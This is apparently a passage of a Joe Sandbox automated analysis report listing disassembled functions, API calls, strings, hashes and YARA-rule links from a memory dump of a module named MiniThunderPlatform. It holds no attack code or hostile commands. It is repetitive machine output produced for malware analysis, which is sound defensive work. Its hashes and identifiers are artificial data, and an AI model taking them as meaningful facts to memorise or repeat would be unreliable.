                                                                                                                                              • buffer is insufficient to read!, xrefs: 100BD336
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to read!
                                                                                                                                              • API String ID: 3827206194-2375833270
                                                                                                                                              • Opcode ID: eeae0fb3c5bb38fd1f9609e541ae9c6f789e7985f4cde9952630bae058721852
                                                                                                                                              • Instruction ID: bd66c0bbb5bc192a66c020f9c502775df1d287d0f8fb75cb7c1a844357254d32
                                                                                                                                              • Opcode Fuzzy Hash: eeae0fb3c5bb38fd1f9609e541ae9c6f789e7985f4cde9952630bae058721852
                                                                                                                                              • Instruction Fuzzy Hash: 4C11187A505640AFC304CF08C944F46F7E5FB99720F1ACA6EE459973A1D734E845CB81
                                                                                                                                              Function 10095510 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Type,?,00000000,?,?,?,?,00000000,1024AC69,000000FF,100992A7), ref: 10095549
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10095572
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V01@@$??$?8D@1@@std@@D@2@@0@0@V?$basic_string@
                                                                                                                                              • String ID: Content-Type
                                                                                                                                              • API String ID: 2073992192-2058190213
                                                                                                                                              • Opcode ID: e87569ee1720008bdfb80c19bfc165b3d79b3364f7086936f42ff15a75ca1fa1
                                                                                                                                              • Instruction ID: a0b233499089ce77a729b44b781d3f7c7d905298e7fedc6e3c6aad041ef1110d
                                                                                                                                              • Opcode Fuzzy Hash: e87569ee1720008bdfb80c19bfc165b3d79b3364f7086936f42ff15a75ca1fa1
                                                                                                                                              • Instruction Fuzzy Hash: CB01DF32504A62EFC310DF09C894B9AB7E9FB48770F55471AF8A993691D734A880CB91
                                                                                                                                              Function 100BD130 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,?,?,?,?,1024EB59,000000FF,100BD3E3,?,?,?,1024EB59,000000FF,1008A7E2,?,?), ref: 100BD15F
                                                                                                                                                • Part of subcall function 100EABC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100EABF6
                                                                                                                                                • Part of subcall function 100EABC0: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAC24
                                                                                                                                                • Part of subcall function 100EABC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAC39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD185
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to write!, xrefs: 100BD156
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to write!
                                                                                                                                              • API String ID: 3827206194-1936633475
                                                                                                                                              • Opcode ID: ab83609f1f155e82a9813fa7347ace1f5e01347973caabb5f664ee6232bc523f
                                                                                                                                              • Instruction ID: 0c1e5de40957cfd8f6b178014f565ca779cb263101fc1a3edd6dd9fa039d27eb
                                                                                                                                              • Opcode Fuzzy Hash: ab83609f1f155e82a9813fa7347ace1f5e01347973caabb5f664ee6232bc523f
                                                                                                                                              • Instruction Fuzzy Hash: 790157B9905240AFC308CF08C984F46B7E5FB88720F15CA6EF85A973A5D734E840CB85
                                                                                                                                              Function 100BD1D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to read!), ref: 100BD1FF
                                                                                                                                                • Part of subcall function 100EAB20: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,00000000,1024EB59,000000FF,1008BC84), ref: 100EAB56
                                                                                                                                                • Part of subcall function 100EAB20: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAB84
                                                                                                                                                • Part of subcall function 100EAB20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAB99
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95EC), ref: 100BD225
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to read!, xrefs: 100BD1F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to read!
                                                                                                                                              • API String ID: 3827206194-2375833270
                                                                                                                                              • Opcode ID: b614368e0044ae36acd9a3835d521ad9fa5610df45c6a8164b570628e3de54b9
                                                                                                                                              • Instruction ID: 1112c7488eb24902df706e9c42ca0f80dee8d4bd63064d413240cc67e7af2ceb
                                                                                                                                              • Opcode Fuzzy Hash: b614368e0044ae36acd9a3835d521ad9fa5610df45c6a8164b570628e3de54b9
                                                                                                                                              • Instruction Fuzzy Hash: BB0135799092409FC308CF08C988F46B7E5FB88720F19CA6AE859973A5D734E804CF85
                                                                                                                                              Function 100BD010 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,00000000,1024EB59,000000FF,1008A7B7,?,?,?), ref: 100BD03B
                                                                                                                                                • Part of subcall function 100EABC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100EABF6
                                                                                                                                                • Part of subcall function 100EABC0: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAC24
                                                                                                                                                • Part of subcall function 100EABC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAC39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD061
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to write!, xrefs: 100BD032
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to write!
                                                                                                                                              • API String ID: 3827206194-1936633475
                                                                                                                                              • Opcode ID: d6767930152c2ecff134aace475f060e1aa5a7475d68e34e3147f5a517eabffc
                                                                                                                                              • Instruction ID: 022842d5681f2a63725fafb3166641c116b04a95c09f74dd31f2b19ffeb458a5
                                                                                                                                              • Opcode Fuzzy Hash: d6767930152c2ecff134aace475f060e1aa5a7475d68e34e3147f5a517eabffc
                                                                                                                                              • Instruction Fuzzy Hash: AD015A79509680DFC319CF18C994F56BBE4FB8A710F058A9DF05A873A2DB34E844CB06
                                                                                                                                              Function 100BD0A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to read!,?,?,00000000,1024EB59,000000FF,1008BC84,?,?,?), ref: 100BD0CB
                                                                                                                                                • Part of subcall function 100EAB20: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,00000000,1024EB59,000000FF,1008BC84), ref: 100EAB56
                                                                                                                                                • Part of subcall function 100EAB20: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAB84
                                                                                                                                                • Part of subcall function 100EAB20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAB99
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95EC), ref: 100BD0F1
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to read!, xrefs: 100BD0C2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to read!
                                                                                                                                              • API String ID: 3827206194-2375833270
                                                                                                                                              • Opcode ID: 539cb0a4cf6e5c093d6b24395bcdd199e3f504fc7c02180303814d3f9c9a7fc1
                                                                                                                                              • Instruction ID: f3715a5dcba01bd6f0d283d43b2dc958dab2348560ee6d47c1c63b7459e681ef
                                                                                                                                              • Opcode Fuzzy Hash: 539cb0a4cf6e5c093d6b24395bcdd199e3f504fc7c02180303814d3f9c9a7fc1
                                                                                                                                              • Instruction Fuzzy Hash: F70113795096809FC319DF18C998F56BBE4FB89720F15CA5DE04A873A2DB34E844CB06
                                                                                                                                              Function 100454C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71 ref: 10045507
                                                                                                                                              • _CxxThrowException.MSVCR71(102B2A60,102B2A60), ref: 10045517
                                                                                                                                              Strings
                                                                                                                                              • SSL handshake: recv data from server error, throw std exception: , xrefs: 100454FF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0exception@@ExceptionThrow
                                                                                                                                              • String ID: SSL handshake: recv data from server error, throw std exception:
                                                                                                                                              • API String ID: 941485209-2071364500
                                                                                                                                              • Opcode ID: 972d60c9e44de16971ace3894fd624d37e489683de934b83f4b92d8c951a0be4
                                                                                                                                              • Instruction ID: c67f6bb4b028bc33af2c275c3c9d4a4829216fa809575c0bcf06bab64c543e8f
                                                                                                                                              • Opcode Fuzzy Hash: 972d60c9e44de16971ace3894fd624d37e489683de934b83f4b92d8c951a0be4
                                                                                                                                              • Instruction Fuzzy Hash: 45F04F35500700AFC324DB69C898DABB7F9FF89220B54895DF84AC7201D732E805CF91
                                                                                                                                              Function 10070120 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1006FC80: RtlInitializeCriticalSection.NTDLL(00000030), ref: 1006FCD8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 10070156
                                                                                                                                                • Part of subcall function 10014360: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,10118FC7), ref: 10014371
                                                                                                                                                • Part of subcall function 10014360: InterlockedIncrement.KERNEL32(10311E80), ref: 10014383
                                                                                                                                                • Part of subcall function 10014360: RtlInitializeCriticalSection.NTDLL(00000024), ref: 1001438D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 10070179
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@CriticalInitializeSection$??1?$basic_string@IncrementInterlockedV01@@
                                                                                                                                              • String ID: CP2spDownload
                                                                                                                                              • API String ID: 792763845-1256050999
                                                                                                                                              • Opcode ID: 1d43e4607e9d1c12d0f8424e7cbd742afeabaa4cd09b71c1bb8621140b0fcb3f
                                                                                                                                              • Instruction ID: 531e665d6098087175944a214b272bc2f3c3e8a58cc579d638b0efad93513686
                                                                                                                                              • Opcode Fuzzy Hash: 1d43e4607e9d1c12d0f8424e7cbd742afeabaa4cd09b71c1bb8621140b0fcb3f
                                                                                                                                              • Instruction Fuzzy Hash: 0D01AD70008391AFC354CF18C948B4BFBE8FBA8B14F408A0DF4AA83390C7B86148CB52
                                                                                                                                              Function 10095537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Type,?,00000000,?,?,?,?,00000000,1024AC69,000000FF,100992A7), ref: 10095549
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10095572
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V01@@$??$?8D@1@@std@@D@2@@0@0@V?$basic_string@
                                                                                                                                              • String ID: Content-Type
                                                                                                                                              • API String ID: 2073992192-2058190213
                                                                                                                                              • Opcode ID: 135c4d9b335de66dcd1d07bc25e8be3e502cb2c54aa7002d9d1e195f1bd190f7
                                                                                                                                              • Instruction ID: 7203036b554c7c2d0eac412ba6c78e1c07d4a55a54fb3ef3911c95a71ede9e52
                                                                                                                                              • Opcode Fuzzy Hash: 135c4d9b335de66dcd1d07bc25e8be3e502cb2c54aa7002d9d1e195f1bd190f7
                                                                                                                                              • Instruction Fuzzy Hash: 82F0B4325042529FC320DF19C8987CAB3E8FF98364F45471DF8AD83290D734A894CB42
                                                                                                                                              Function 1009D620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CWD), ref: 1009D644
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1009D446
                                                                                                                                                • Part of subcall function 1009D410: ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1009D45A
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027E6E8), ref: 1009D470
                                                                                                                                                • Part of subcall function 1009D410: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1009D47B
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10277F04), ref: 1009D48A
                                                                                                                                                • Part of subcall function 1009D410: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,USER), ref: 1009D49C
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER ******), ref: 1009D4AE
                                                                                                                                                • Part of subcall function 1009D410: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D4F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D66F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@D@1@@std@@D@2@@0@V01@V?$basic_string@Y?$basic_string@$??$?8??$?9?append@?$basic_string@V01@@V12@V12@@
                                                                                                                                              • String ID: CWD
                                                                                                                                              • API String ID: 587145879-165061777
                                                                                                                                              • Opcode ID: de0a4bccb1bce0a357cbed4f88a2673106ceac80d5424e5e3f04556375859cb6
                                                                                                                                              • Instruction ID: 3a89efb06d934cc6a73835f3f9120278b5de509451c32ab1e7904d6236265dca
                                                                                                                                              • Opcode Fuzzy Hash: de0a4bccb1bce0a357cbed4f88a2673106ceac80d5424e5e3f04556375859cb6
                                                                                                                                              • Instruction Fuzzy Hash: F2F05E76018690EBC319EF48C988F9ABBE4FB6C720F044B1EF45A832D0DB785444CB52
                                                                                                                                              Function 10015031 Relevance: 5.1, APIs: 4, Instructions: 114COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCR71(?,?,?,?,?,?), ref: 100150A0
                                                                                                                                              • memcpy.MSVCR71(?,?,00000010,?,00000001,?,?,?,?,?), ref: 100150E3
                                                                                                                                              • memset.MSVCR71(?,00000010,00000010,?,?,?), ref: 10015104
                                                                                                                                              • memcpy.MSVCR71(?,?,00000000,?,?,?), ref: 1001511F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
